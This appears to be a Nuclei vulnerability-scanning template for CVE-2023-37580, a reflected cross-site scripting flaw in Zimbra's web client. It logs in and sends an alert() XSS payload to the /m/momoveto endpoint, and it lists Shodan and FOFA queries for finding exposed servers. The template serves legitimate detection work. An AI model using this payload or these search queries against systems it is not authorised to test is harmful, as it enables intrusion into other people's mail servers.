nuclei-templates/http/cves/2023/CVE-2023-37580.yaml

64 lines
1.9 KiB
YAML
Raw Normal View History

id: CVE-2023-37580
info:
name: Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client.
2023-09-06 11:43:37 +00:00
remediation: |
2023-09-06 11:59:08 +00:00
Apply the latest security patches or upgrade to a non-vulnerable version of Zimbra Collaboration Suite (ZCS).
reference:
- https://github.com/Zimbra/zm-web-client/pull/827
- https://blog.zimbra.com/2023/07/security-update-for-zimbra-collaboration-suite-version-8-8-15/
- https://nvd.nist.gov/vuln/detail/CVE-2023-37580
2023-08-31 11:46:18 +00:00
- https://wiki.zimbra.com/wiki/Security_Center
- https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy
classification:
2023-08-31 11:46:18 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-37580
2023-08-31 11:46:18 +00:00
cwe-id: CWE-79
epss-score: 0.20311
epss-percentile: 0.95707
2023-09-06 11:43:37 +00:00
cpe: cpe:2.3:a:zimbra:zimbra:*:*:*:*:*:*:*:*
metadata:
max-request: 2
2023-08-31 11:46:18 +00:00
vendor: zimbra
product: zimbra
2023-09-06 11:43:37 +00:00
shodan-query: http.favicon.hash:475145467
fofa-query: icon_hash="475145467"
2023-08-31 11:46:18 +00:00
tags: cve,cve2023,zimbra,xss,authenticated,kev
http:
- raw:
- |
POST /zimbra/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
loginOp=login&username={{username}}&password={{password}}&client=mobile
- |
2023-08-01 05:58:24 +00:00
GET /m/momoveto?st="><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
2023-08-31 11:46:18 +00:00
matchers-condition: and
matchers:
- type: word
part: body_2
words:
2023-08-01 05:58:24 +00:00
- '<img src=x onerror=alert(document.domain)>'
- 'id="zMoveForm"'
condition: and
- type: word
part: header_2
words:
- text/html
- type: status
status:
- 200